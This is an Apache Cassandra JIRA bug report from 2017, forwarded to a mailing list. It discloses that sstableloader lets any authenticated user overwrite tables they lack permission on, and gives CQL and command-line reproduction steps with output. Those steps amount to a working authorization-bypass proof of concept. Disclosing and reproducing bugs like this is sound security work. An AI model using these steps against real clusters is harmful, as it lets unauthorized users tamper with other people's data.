Posted to commits@cassandra.apache.org by "Andrzej Bober (JIRA)" <ji...@apache.org> on 2017/11/13 10:27:00 UTC
[jira] [Created] (CASSANDRA-14009) Any user can overwrite any table with sstableloader
Andrzej Bober created CASSANDRA-14009:
-----------------------------------------
Summary: Any user can overwrite any table with sstableloader
Key: CASSANDRA-14009
URL: https://issues.apache.org/jira/browse/CASSANDRA-14009
Project: Cassandra
Issue Type: Bug
Components: Auth
Reporter: Andrzej Bober
Fix For: 2.1.x, 2.2.x, 3.0.x, 3.11.x
Hi there,
Looks like any user can overwrite any table with sstableloader.
Tested on Ubuntu 16.04.3, Java 1.8.0_151_b12, and Cassandra 2.1.19 / 2.2.11 / 3.0.15 / 3.11.1.
{code:sql}
cassandra@cqlsh> CREATE USER alice WITH PASSWORD 'Alice';
cassandra@cqlsh> CREATE USER bob WITH PASSWORD 'Bob';
cassandra@cqlsh> CREATE KEYSPACE db4alice WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};
cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE db4alice TO alice;
alice@cqlsh> CREATE TABLE users (userid text PRIMARY KEY, password text);
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user1', 'pass1');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user2', 'pass2');
alice@cqlsh> INSERT INTO users (userid, password) VALUES ('user3', 'pass3');
alice@cqlsh> truncate users;
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
(0 rows)
sstableloader -d 127.0.0.1 -u bob -pw Bob ./db4alice/users
alice@cqlsh> select * from db4alice.users ;
userid | password
--------+----------
user2 | pass2
user1 | pass1
user3 | pass3
(3 rows)
{code}
Looks like a pretty serious bug to me.